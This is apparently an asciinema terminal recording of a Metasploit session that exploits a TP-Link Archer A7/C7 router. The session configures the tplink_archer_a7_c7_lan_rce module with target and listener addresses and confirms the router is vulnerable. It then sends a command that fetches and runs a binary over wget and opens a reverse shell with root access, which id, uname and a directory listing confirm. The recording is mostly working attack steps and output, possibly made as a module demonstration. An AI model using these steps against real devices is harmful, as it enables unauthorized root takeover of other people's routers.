{"version": 2, "width": 137, "height": 75, "timestamp": 1585748256, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.02569, "o", "\u001b]0;rado@flashback: /opt/metasploit-framework\u0007\u001b[01;32mrado@flashback\u001b[00m:\u001b[01;34m/opt/metasploit-framework\u001b[00m$ "]
[1.109231, "o", "."]
[1.165162, "o", "/"]
[1.36721, "o", "m"]
[1.514215, "o", "s"]
[1.725176, "o", "f"]
[1.895926, "o", "c"]
[1.968948, "o", "o"]
[2.060193, "o", "nsole "]
[2.978546, "o", "\r\n"]
[4.856588, "o", "[*] Starting the Metasploit Framework console.../\r"]
[4.957048, "o", "[*] Starting the Metasploit Framework console...-\r"]
[5.002813, "o", "\u001b[1m\u001b[31m[-]\u001b[0m ***\r\n"]
[5.002937, "o", "\u001b[1m\u001b[31m[-]\u001b[0m * WARNING: No database support: No database YAML file\r\n"]
[5.003007, "o", "\u001b[1m\u001b[31m[-]\u001b[0m ***\r\n"]
[5.071692, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[5.257465, "o", "[*] starting the Metasploit Framework console...|\r"]
[5.37278, "o", "[*] STarting the Metasploit Framework console.../\r"]
[5.472993, "o", "[*] StArting the Metasploit Framework console...-\r"]
[5.573179, "o", "[*] StaRting the Metasploit Framework console...\\\r"]
[5.673695, "o", "[*] StarTing the Metasploit Framework console...|\r"]
[5.77385, "o", "[*] StartIng the Metasploit Framework console.../\r"]
[5.874041, "o", "[*] StartiNg the Metasploit Framework console...-\r"]
[5.974279, "o", "[*] StartinG the Metasploit Framework console...\\\r"]
[6.074432, "o", "[*] Starting the Metasploit Framework console...|\r"]
[6.174579, "o", "[*] Starting The Metasploit Framework console.../\r"]
[6.274695, "o", "[*] Starting tHe Metasploit Framework console...-\r"]
[6.374863, "o", "[*] Starting thE Metasploit Framework console...\\\r"]
[6.475227, "o", "[*] Starting the Metasploit Framework console...|\r"]
[6.575375, "o", "[*] Starting the metasploit Framework console.../\r"]
[6.675485, "o", "[*] Starting the MEtasploit Framework console...-\r"]
[6.775626, "o", "[*] Starting the MeTasploit Framework console...\\\r"]
[6.875782, "o", "[*] Starting the MetAsploit Framework console...|\r"]
[7.004657, "o", "[*] Starting the MetaSploit Framework console.../\r"]
[7.021973, "o", "\r                                                  \r\n"]
[7.022435, "o", "\u001b[0m"]
[7.023308, "o", "\u001b[36m\u001b[0m\u001b[0m ____________________________________ \u001b[0m\r\n\u001b[0m< My Little Pwny: Exploits are Magic\u001b[0m >\u001b[0m\r\n\u001b[0m ------------------------------------ \u001b[0m\u001b[00m\r\n                          \u001b[0m\\\u001b[0m                  \u001b[00m\r\n                           \u001b[0m\\\u001b[0m                 \u001b[00m\r\n                            \u001b[0m\\\u001b[0m                \u001b[00m\r\n                            \u001b[38;5;238m▄▄\u001b[48;5;238;38;5;60m▄▄▄▄▄▄\u001b[49;38;5;238m▄▄\u001b[39m       \u001b[00m\r\n                          \u001b[38;5;238m▄\u001b[48;5;238;38;5;60m▄\u001b[48;5;60m█████████\u001b[38;5;238m▄\u001b[48;5;238;38;5;60m▄▄▄▄\u001b[49;38;5;238m▄▄\u001b[39m \u001b[00m\r\n                         \u001b[48;5;238;38;5;238m█\u001b[48;5;60;38;5;96m▄\u001b[48;5;96;38;5;139m▄▄\u001b[38;5;96m█\u001b[48;5;60;38;5;60m██████\u001b[48;5;238;38;5;238m█\u001b[48;5;60m▄\u001b[48;5;238;38;5;60m▄▄\u001b[48;5;60;38;5;238m▄\u001b[38;5;60m███\u001b[48;5;238;38;5;238m█\u001b[49;39m\u001b[00m\r\n                        \u001b[48;5;238;38;5;238m█\u001b[48;5;60;38;5;96m▄\u001b[48;5;96;38;5;139m▄\u001b[48;5;139;"]
[7.023413, "o", "38;5;96m▄\u001b[38;5;139m█\u001b[48;5;96;38;5;96m█\u001b[48;5;60;38;5;238m▄\u001b[38;5;60m█████\u001b[48;5;238m▄\u001b[48;5;60m███\u001b[48;5;238;38;5;238m█\u001b[48;5;60;38;5;60m███\u001b[48;5;238;38;5;238m█\u001b[49;39m\u001b[00m\r\n                      \u001b[38;5;238m▄\u001b[48;5;238;38;5;60m▄▄\u001b[48;5;96;38;5;96m█\u001b[48;5;139;38;5;139m█\u001b[48;5;96;38;5;96m█\u001b[48;5;139;38;5;139m███\u001b[48;5;238m▄▄\u001b[48;5;60;38;5;238m▄▄▄▄▄\u001b[48;5;238;38;5;96m▄\u001b[38;5;60m▄\u001b[48;5;60m██\u001b[38;5;238m▄\u001b[49m▀\u001b[39m \u001b[00m\r\n                     \u001b[48;5;238;38;5;238m█\u001b[48;5;60;38;5;60m███\u001b[48;5;96m▄\u001b[48;5;139;38;5;139m████\u001b[48;5;16m▄\u001b[48;5;139;38;5;16m▄\u001b[48;5;16;38;5;231m▄▄\u001b[48;5;96;38;5;16m▄\u001b[48;5;139m▄\u001b[38;5;139m██\u001b[48;5;96m▄\u001b[48;5;60;38;5;96m▄\u001b[38;5;60m█\u001b[48;5;238m▄\u001b[49;38;5;238m▄\u001b[39m  \u001b[00m\r\n                     \u001b[48;5;238;38;5;238m█\u001b[48;5;60;38;5;60m████\u001b[48;5;96;38;5;96m█\u001b[48;5;139;38;5;139m██\u001b[48;5;16;38;5;16m██\u001b[48;5;231;38;5;231m██\u001b[48;5;96;38;5;96m█\u001b[48;5"]
[7.023488, "o", ";16;38;5;16m█\u001b[48;5;231;38;5;231m█\u001b[48;5;16;38;5;16m█\u001b[48;5;139;38;5;139m██\u001b[48;5;96;38;5;96m█\u001b[48;5;60;38;5;60m██\u001b[48;5;238;38;5;238m█\u001b[49;39m  \u001b[00m\r\n                     \u001b[38;5;238m▀\u001b[48;5;60m▄\u001b[38;5;60m███\u001b[48;5;96;38;5;238m▄\u001b[48;5;139;38;5;139m███\u001b[38;5;16m▄\u001b[48;5;231;38;5;231m██\u001b[48;5;96;38;5;139m▄\u001b[48;5;231;38;5;16m▄▄\u001b[48;5;16m█\u001b[48;5;139;38;5;139m██\u001b[48;5;96;38;5;96m█\u001b[49;38;5;238m▀▀\u001b[39m   \u001b[00m\r\n       \u001b[38;5;238m▄\u001b[48;5;238;38;5;60m▄▄▄▄▄▄\u001b[49;38;5;238m▄▄\u001b[39m      \u001b[38;5;238m▀\u001b[48;5;60m▄\u001b[38;5;60m██\u001b[48;5;238m▄\u001b[48;5;139;38;5;238m▄\u001b[38;5;139m██\u001b[38;5;96m▄\u001b[48;5;231;38;5;139m▄\u001b[38;5;231m█\u001b[48;5;182m▄\u001b[48;5;16;38;5;139m▄\u001b[48;5;231;38;5;96m▄\u001b[48;5;16;38;5;139m▄\u001b[48;5;139m██\u001b[48;5;96;38;5;96m█\u001b[49m▄\u001b[39m    \u001b[00m\r\n     \u001b[38;5;238m▄\u001b[48;5;238;38;5;60m▄\u001b[48;5;60m█████████\u001b[48;5;238m▄\u001b[49;38;5;238m▄\u001b[39m     \u001b[38;5;238m▀\u001b[48;5;60;38;5;60m█\u001b[38;5;238m▄\u001b[38;5;60"]
[7.023555, "o", "m██\u001b[48;5;238;38;5;238m█\u001b[48;5;139;38;5;139m██\u001b[48;5;96m▄\u001b[48;5;139m█\u001b[48;5;231m▄▄▄\u001b[48;5;139m█\u001b[38;5;96m▄\u001b[38;5;139m██\u001b[48;5;96;38;5;96m█\u001b[49;39m    \u001b[00m\r\n    \u001b[48;5;238;38;5;238m█\u001b[48;5;60;38;5;60m██████\u001b[38;5;238m▄\u001b[49m▀▀▀\u001b[48;5;60m▄\u001b[38;5;60m█\u001b[48;5;238m▄\u001b[49;38;5;238m▄\u001b[39m    \u001b[38;5;238m▄\u001b[48;5;60m▄\u001b[38;5;60m█\u001b[48;5;238m▄▄\u001b[48;5;60m█\u001b[48;5;238m▄\u001b[48;5;139;38;5;238m▄\u001b[38;5;139m█\u001b[38;5;96m▄▄▄▄▄▄\u001b[49m▀▀\u001b[39m     \u001b[00m\r\n   \u001b[48;5;238;38;5;238m█\u001b[48;5;60;38;5;60m██████\u001b[48;5;238;38;5;238m█\u001b[49;39m     \u001b[38;5;238m▀\u001b[48;5;60;38;5;96m▄\u001b[48;5;238;38;5;139m▄\u001b[48;5;96m▄▄▄\u001b[48;5;238;38;5;238m█\u001b[48;5;60;38;5;60m██\u001b[48;5;238m▄\u001b[48;5;60m█\u001b[48;5;238;38;5;238m█\u001b[48;5;60m▄▄\u001b[48;5;238;38;5;139m▄\u001b[48;5;139m█\u001b[48;5;96;38;5;96m█\u001b[49;39m            \u001b[00m\r\n   \u001b[48;5;238;38;5;238m█\u001b[48;5;60;38;5;60m██████\u001b[48;5;238;38;5;238m█\u001b[49;39m \u001b[38;5;238m▄▄\u001b[39m  \u001b[38;5;96m"]
[7.023619, "o", "▄\u001b[48;5;96;38;5;139m▄\u001b[48;5;139m█████\u001b[48;5;238m▄\u001b[48;5;60;38;5;238m▄▄\u001b[48;5;238;38;5;139m▄\u001b[48;5;139m█████\u001b[48;5;96;38;5;96m█\u001b[49;39m            \u001b[00m\r\n   \u001b[48;5;238;38;5;238m█\u001b[48;5;60;38;5;60m███████\u001b[48;5;238m▄\u001b[48;5;60;38;5;238m▄\u001b[38;5;60m█\u001b[48;5;238;38;5;238m█\u001b[49;39m \u001b[48;5;96;38;5;96m█\u001b[48;5;139;38;5;139m██████████████\u001b[38;5;96m▄\u001b[49m▀\u001b[39m            \u001b[00m\r\n   \u001b[38;5;238m▀\u001b[48;5;60m▄\u001b[38;5;60m██████\u001b[38;5;238m▄▄▄\u001b[49m▀\u001b[39m \u001b[38;5;96m▀\u001b[48;5;139m▄\u001b[38;5;139m████\u001b[48;5;96;38;5;96m█\u001b[48;5;139;38;5;139m███████\u001b[38;5;96m▄\u001b[49m▀\u001b[39m             \u001b[00m\r\n  \u001b[38;5;238m▄▄\u001b[48;5;238m█\u001b[48;5;60;38;5;60m███\u001b[38;5;238m▄▄\u001b[38;5;60m█\u001b[48;5;238;38;5;238m█\u001b[49;39m    \u001b[38;5;96m▄\u001b[48;5;96m█\u001b[48;5;139;38;5;139m██\u001b[38;5;96m▄\u001b[48;5;96m█\u001b[48;5;139m▄▄▄▄\u001b[38;5;139m██\u001b[38;5;96m▄\u001b[48;5;96m██\u001b[49;39m              \u001b[00m\r\n \u001b[48;5;238;38"]
[7.023682, "o", ";5;238m█\u001b[48;5;60;38;5;60m███\u001b[48;5;238;38;5;238m█\u001b[48;5;60;38;5;60m█\u001b[48;5;238;38;5;238m█\u001b[48;5;60;38;5;60m██\u001b[38;5;238m▄\u001b[49m▀\u001b[39m   \u001b[48;5;96;38;5;96m█\u001b[48;5;139;38;5;139m███\u001b[48;5;96;38;5;96m█\u001b[38;5;139m▄\u001b[48;5;139;38;5;96m▄\u001b[49m▀\u001b[39m  \u001b[48;5;96;38;5;96m█\u001b[48;5;139;38;5;139m██\u001b[48;5;96;38;5;96m█\u001b[48;5;139;38;5;139m█\u001b[48;5;96;38;5;96m█\u001b[49;39m              \u001b[00m\r\n \u001b[48;5;238;38;5;238m█\u001b[48;5;60;38;5;60m██\u001b[48;5;238m▄\u001b[48;5;60m██\u001b[48;5;238;38;5;238m█\u001b[49m▀▀\u001b[39m     \u001b[48;5;96;38;5;96m█\u001b[48;5;139;38;5;139m██\u001b[48;5;96;38;5;96m█\u001b[48;5;139;38;5;139m██\u001b[48;5;96;38;5;96m█\u001b[49;39m   \u001b[48;5;96;38;5;96m█\u001b[48;5;139;38;5;139m██\u001b[48;5;96m▄\u001b[48;5;139;38;5;96m▄\u001b[48;5;96;38;5;139m▄\u001b[49;38;5;96m▄\u001b[39m             \u001b[00m\r\n  \u001b[38;5;238m▀\u001b[48;5;60m▄▄▄\u001b[49m▀\u001b[39m       \u001b[48;5;96;38;5;96m█\u001b[48;5;139;38;5;139m███\u001b[48;5;96;38;5;96m█\u001b[48;5;139;38;5;139m██\u001b[48;5;96;38;5;96m█\u001b[49;39m   \u001b[48;5;96;38;5;96m█\u001b[48;"]
[7.023749, "o", "5;139;38;5;139m███\u001b[48;5;96;38;5;96m█\u001b[48;5;139;38;5;139m█\u001b[48;5;96;38;5;96m█\u001b[49;39m             \u001b[00m\r\n              \u001b[48;5;96;38;5;96m█\u001b[48;5;139;38;5;139m███\u001b[48;5;96;38;5;96m█\u001b[48;5;139;38;5;139m██\u001b[48;5;96;38;5;96m█\u001b[49;39m   \u001b[48;5;96;38;5;96m█\u001b[48;5;139;38;5;139m███\u001b[48;5;96m▄\u001b[48;5;139;38;5;96m▄\u001b[38;5;139m█\u001b[48;5;96;38;5;96m█\u001b[49m▄\u001b[39m           \u001b[00m\r\n             \u001b[48;5;96;38;5;96m█\u001b[48;5;139;38;5;139m████\u001b[48;5;96;38;5;96m█\u001b[48;5;139m▄▄\u001b[48;5;96m█\u001b[49;39m   \u001b[48;5;96;38;5;96m█\u001b[48;5;139;38;5;139m████\u001b[48;5;96;38;5;96m█\u001b[48;5;139m▄▄\u001b[48;5;96m█\u001b[49;39m           \u001b[00m\r\n             \u001b[48;5;96;38;5;96m█\u001b[48;5;139m▄▄▄▄\u001b[48;5;96m█\u001b[49;39m       \u001b[48;5;96;38;5;96m█\u001b[48;5;139m▄▄▄▄\u001b[48;5;96m█\u001b[49;39m             \u001b[00m\r\n                                             \u001b[00m\r\n\u001b[0m\r\n\r\n       =[ \u001b[33mmetasploit v5.0.80-dev-b85cd9b682\u001b[0m               ]\r\n+ -- --=[ 1983 exploits - 1089 auxiliary - 339 post    "]
[7.023808, "o", "   ]\r\n+ -- --=[ 559 payloads - 45 encoders - 10 nops            ]\r\n+ -- --=[ 7 evasion                                       ]\r\n\r\n"]
[7.045611, "o", "\u001b[?1034h"]
[7.05106, "o", "\u001b[4mmsf5\u001b[0m \u001b[0m> "]
[9.189446, "o", "u"]
[9.261179, "o", "s"]
[9.429221, "o", "e"]
[9.499106, "o", " "]
[10.038125, "o", "e"]
[10.038638, "o", "x"]
[10.038719, "o", "p"]
[10.038774, "o", "l"]
[10.039256, "o", "o"]
[10.039317, "o", "i"]
[10.03941, "o", "t"]
[10.039875, "o", "/"]
[10.039951, "o", "l"]
[10.040413, "o", "i"]
[10.040563, "o", "n"]
[10.040998, "o", "u"]
[10.04111, "o", "x"]
[10.041481, "o", "/"]
[10.041635, "o", "m"]
[10.042063, "o", "i"]
[10.042551, "o", "s"]
[10.042668, "o", "c"]
[10.043043, "o", "/"]
[10.043161, "o", "t"]
[10.043546, "o", "p"]
[10.044088, "o", "l"]
[10.04427, "o", "i"]
[10.044754, "o", "n"]
[10.045244, "o", "k"]
[10.045402, "o", "_"]
[10.045875, "o", "a"]
[10.046351, "o", "r"]
[10.046859, "o", "c"]
[10.047276, "o", "h"]
[10.047765, "o", "e"]
[10.047942, "o", "r"]
[10.048386, "o", "_"]
[10.048821, "o", "a"]
[10.049195, "o", "7"]
[10.049496, "o", "_"]
[10.049831, "o", "c"]
[10.050195, "o", "7"]
[10.05054, "o", "_"]
[10.050936, "o", "l"]
[10.051268, "o", "a"]
[10.051574, "o", "n"]
[10.052005, "o", "_"]
[10.052289, "o", "r"]
[10.052668, "o", "c"]
[10.053064, "o", "e"]
[10.730312, "o", "\r\r\n"]
[10.733242, "o", "\u001b[0m"]
[10.779479, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mlinux/misc/tplink_archer_a7_c7_lan_rce\u001b[0m) \u001b[0m> "]
[12.859055, "o", "s"]
[13.051433, "o", "e"]
[13.560515, "o", "t"]
[13.651565, "o", " "]
[13.971931, "o", "R"]
[14.093184, "o", "H"]
[14.157683, "o", "O"]
[14.19044, "o", "S"]
[14.328457, "o", "T"]
[14.417955, "o", " "]
[14.990136, "o", "1"]
[15.072227, "o", "9"]
[15.126996, "o", "2"]
[15.27552, "o", "."]
[15.384702, "o", "1"]
[15.642292, "o", "6"]
[15.72744, "o", "8"]
[15.9431, "o", "."]
[16.155545, "o", "0"]
[16.378203, "o", "."]
[16.461897, "o", "1"]
[16.691265, "o", "\r"]
[16.691399, "o", "\r\n"]
[16.694702, "o", "\u001b[0m"]
[16.695378, "o", "RHOST => 192.168.0.1\r\n"]
[16.705567, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mlinux/misc/tplink_archer_a7_c7_lan_rce\u001b[0m) \u001b[0m> "]
[17.609711, "o", "s"]
[17.760916, "o", "e"]
[17.845062, "o", "t"]
[17.919182, "o", " "]
[18.107095, "o", "L"]
[18.367341, "o", "H"]
[18.415474, "o", "O"]
[18.447009, "o", "S"]
[18.584275, "o", "T"]
[18.702285, "o", " "]
[19.358967, "o", "1"]
[19.467906, "o", "9"]
[19.50933, "o", "2"]
[19.704622, "o", "."]
[20.11083, "o", "1"]
[20.336543, "o", "6"]
[20.430295, "o", "8"]
[20.658891, "o", "."]
[20.916782, "o", "0"]
[21.153932, "o", "."]
[22.005162, "o", "2"]
[22.071972, "o", "3"]
[22.230745, "o", "8"]
[23.520061, "o", "\r\r\n"]
[23.523081, "o", "\u001b[0m"]
[23.523686, "o", "LHOST => 192.168.0.238\r\n"]
[23.532662, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mlinux/misc/tplink_archer_a7_c7_lan_rce\u001b[0m) \u001b[0m> "]
[24.760342, "o", "s"]
[25.147195, "o", "e"]
[25.241724, "o", "t"]
[25.366885, "o", " "]
[25.85257, "o", "S"]
[26.237274, "o", "R"]
[26.951561, "o", "V"]
[27.203041, "o", "H"]
[27.261037, "o", "O"]
[27.326274, "o", "S"]
[27.494328, "o", "T"]
[27.89824, "o", " "]
[28.160317, "o", "1"]
[28.273374, "o", "9"]
[28.312012, "o", "2"]
[28.466323, "o", "."]
[28.632383, "o", "1"]
[29.305007, "o", "6"]
[29.39788, "o", "8"]
[29.631469, "o", "."]
[29.848987, "o", "0"]
[30.050504, "o", "."]
[30.942178, "o", "2"]
[30.991405, "o", "3"]
[31.088664, "o", "8"]
[32.465017, "o", "\r"]
[32.465072, "o", "\r\n"]
[32.467963, "o", "\u001b[0m"]
[32.468506, "o", "SRVHOST => 192.168.0.238\r\n"]
[32.47784, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mlinux/misc/tplink_archer_a7_c7_lan_rce\u001b[0m) \u001b[0m> "]
[33.465408, "o", "o"]
[33.700988, "o", "p"]
[33.837853, "o", "t"]
[33.9198, "o", "i"]
[33.984803, "o", "o"]
[34.096153, "o", "n"]
[34.174793, "o", "s"]
[35.262519, "o", "\r\r\n"]
[35.265539, "o", "\u001b[0m"]
[35.269789, "o", "\r\nModule options (exploit/linux/misc/tplink_archer_a7_c7_lan_rce):\r\n\r\n   Name     Current Setting  Required  Description\r\n   ----     ---------------  --------  -----------\r\n   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]\r\n   RHOSTS   192.168.0.1      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'\r\n   RPORT    20002            yes       The target port (TCP)\r\n   SRVHOST  192.168.0.238    yes       IP address of the host serving the exploit\r\n   SSL      false            no        Negotiate SSL/TLS for outgoing connections\r\n   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)\r\n   URIPATH                   no        The URI to use for this exploit (default is random)\r\n   VHOST                     no        HTTP server virtual host\r\n\r\n"]
[35.275848, "o", "\r\nPayload options (linux/mipsbe/shell_reverse_tcp):\r\n\r\n   Name   Current Setting  Required  Description\r\n   ----   ---------------  --------  -----------\r\n   LHOST  192.168.0.238    yes       The listen address (an interface may be specified)\r\n   LPORT  4444             yes       The listen port\r\n\r\n"]
[35.276497, "o", "\r\nExploit target:\r\n\r\n   Id  Name\r\n   --  ----\r\n   0   TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)\r\n\r\n\r\n"]
[35.284877, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mlinux/misc/tplink_archer_a7_c7_lan_rce\u001b[0m) \u001b[0m> "]
[39.304042, "o", "c"]
[39.407685, "o", "h"]
[39.44171, "o", "e"]
[39.563659, "o", "c"]
[39.67128, "o", "k"]
[39.967762, "o", "\r\r\n"]
[39.970508, "o", "\u001b[0m"]
[40.02818, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.0.1:20002 - The target is vulnerable.\r\n"]
[40.037169, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mlinux/misc/tplink_archer_a7_c7_lan_rce\u001b[0m) \u001b[0m> "]
[41.621435, "o", "r"]
[41.721813, "o", "u"]
[41.75413, "o", "n"]
[42.909781, "o", "\r\r\n"]
[42.912626, "o", "\u001b[0m"]
[42.938291, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Exploit running as background job 0.\r\n"]
[42.938435, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Exploit completed, but no session was created.\r\n"]
[42.945289, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mlinux/misc/tplink_archer_a7_c7_lan_rce\u001b[0m) \u001b[0m> "]
[42.949509, "o", "\r\n"]
[42.950058, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Started reverse TCP handler on 192.168.0.238:4444 \r\n"]
[42.953311, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Attempting to exploit TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)\r\n"]
[42.954982, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Starting up our web service on http://192.168.0.238:4445 ...\r\n"]
[42.956557, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Using URL: http://192.168.0.238:4445/z\r\n"]
[42.957271, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.0.1:20002 - Connecting to the target\r\n"]
[42.957964, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.0.1:20002 - Sending command file byte by byte\r\n"]
[42.95838, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.0.1:20002 - Command: wget http://192.168.0.238:4445/z;chmod +x z;./z\r\n"]
[55.011827, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.0.1:20002 - [0%]= = => - - - - - - - - - - - - - - - -[100%]\r\n"]
[76.66614, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.0.1:20002 - [0%]= = = = = = => - - - - - - - - - - - -[100%]\r\n"]
[98.320655, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.0.1:20002 - [0%]= = = = = = = = = = => - - - - - - - -[100%]\r\n"]
[115.164124, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.0.1:20002 - [0%]= = = = = = = = = = = = = = => - - - -[100%]\r\n"]
[132.008144, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.0.1:20002 - [0%]= = = = = = = = = = = = = = = = = = =>[100%]\r\n"]
[135.617892, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.0.1:20002 - Command file sent, attempting to execute...\r\n"]
[136.348211, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.0.1:20002 - Sending executable to the router\r\n"]
[136.348487, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.0.1:20002 - Sit back and relax, Shelly will come visit soon!\r\n"]
[136.569295, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Command shell session 1 opened (192.168.0.238:4444 -> 192.168.0.1:49508) at 2020-04-01 15:39:53 +0200\r\n"]
[136.821898, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Server stopped.\r\n"]
[138.813097, "o", "\r\r\n"]
[138.815323, "o", "\u001b[0m"]
[138.822025, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mlinux/misc/tplink_archer_a7_c7_lan_rce\u001b[0m) \u001b[0m> "]
[139.544853, "o", "s"]
[139.715502, "o", "e"]
[139.881696, "o", "s"]
[140.040431, "o", "s"]
[140.149278, "o", "ions "]
[140.667688, "o", "1"]
[141.470822, "o", "\r\r\n"]
[141.473716, "o", "\u001b[0m"]
[141.474205, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Starting interaction with 1...\r\n\r\n"]
[143.277796, "o", "i"]
[143.327301, "o", "d"]
[144.855943, "o", "\r\n"]
[144.868107, "o", "uid=0(root) gid=0(root)\r\n"]
[145.666177, "o", "u"]
[145.867926, "o", "n"]
[146.24805, "o", "a"]
[146.348575, "o", "m"]
[146.403639, "o", "e"]
[146.495812, "o", " "]
[146.54083, "o", "-"]
[146.639611, "o", "a"]
[147.253441, "o", "\r\n"]
[147.26057, "o", "Linux ArcherC7v5 3.3.8 #1 Mon May 20 18:53:02 CST 2019 mips GNU/Linux\r\n"]
[148.08027, "o", "l"]
[148.11799, "o", "s"]
[148.163785, "o", " "]
[148.222034, "o", "-"]
[148.258781, "o", "l"]
[148.300938, "o", " "]
[148.511236, "o", "/"]
[148.799454, "o", "\r\n"]
[148.813967, "o", "-rw-r--r--    1 root     root            31 Jul 26 00:00 -\r\ndrwxrwxr-x    2 root     root           689 Jul 26  2019 bin\r\ndrwxr-xr-x    6 root     root           840 Jul 26 00:01 dev\r\ndrwxrwxr-x    1 root     root           400 Jul 26 00:01 etc\r\n-rw-r--r--    1 root     root             1 Jul 26 00:06 i\"})\r\ndrwxrwxr-x    1 root     root            60 May 20 08:59 lib\r\ndrwxr-xr-x    2 root     root             3 Jul 26  2019 mnt\r\ndrwxr-xr-x    5 root     root           200 Jul 26 00:06 overlay\r\ndr-xr-xr-x  100 root     root             0 Jan  1  1970 proc\r\ndrwxr-xr-x   16 root     root           247 Jul 26  2019 rom\r\ndrwxr-xr-x    2 root     root             3 Jul 26  2019 root\r\ndrwxrwxr-x    2 root     root          1431 Jul 26  2019 sbin\r\ndrwxr-xr-x   14 root     root             0 Jan  1  1970 sys\r\ndrwxrwxrwt   15 root     root           880 Jul 26 00:06 tmp\r\ndrwxrwxr-x    6 root     root            74 Jun 20 12:06 usr\r\nlrwxrwxrwx    1 root     root             4 Jul 26  2019 var -> /tmp\r\ndrwxrwxr-x    1 ro"]
[148.814069, "o", "ot     root            80 Jul 26  2019 www\r\n-rwxr-xr-x    1 root     root           268 Jul 26 00:06 z\r\n-rw-r--r--    1 root     root            47 Jul 26 00:06 z\"})\r\n"]
[150.784515, "o", "\r\n"]
[151.39943, "o", "^C"]
[151.399898, "o", "\r\nAbort session 1? [y/N]  "]
[152.46835, "o", "y"]
[152.918038, "o", "\r\n"]
[152.918198, "o", "\"\"\r\n"]
[152.918514, "o", "\r\n"]
[152.918837, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.0.1 - Command shell session 1 closed.  Reason: User exit\r\n"]
[152.926172, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mlinux/misc/tplink_archer_a7_c7_lan_rce\u001b[0m) \u001b[0m> "]
[153.613146, "o", "Interrupt: use the 'exit' command to quit\r\n"]
[153.61998, "o", "\u001b[4mmsf5\u001b[0m exploit(\u001b[1m\u001b[31mlinux/misc/tplink_archer_a7_c7_lan_rce\u001b[0m) \u001b[0m> "]
[154.239988, "o", "\u001b[0m"]
[154.262293, "o", "\u001b]0;rado@flashback: /opt/metasploit-framework\u0007\u001b[01;32mrado@flashback\u001b[00m:\u001b[01;34m/opt/metasploit-framework\u001b[00m$ "]
[155.403093, "o", "exit\r\n"]
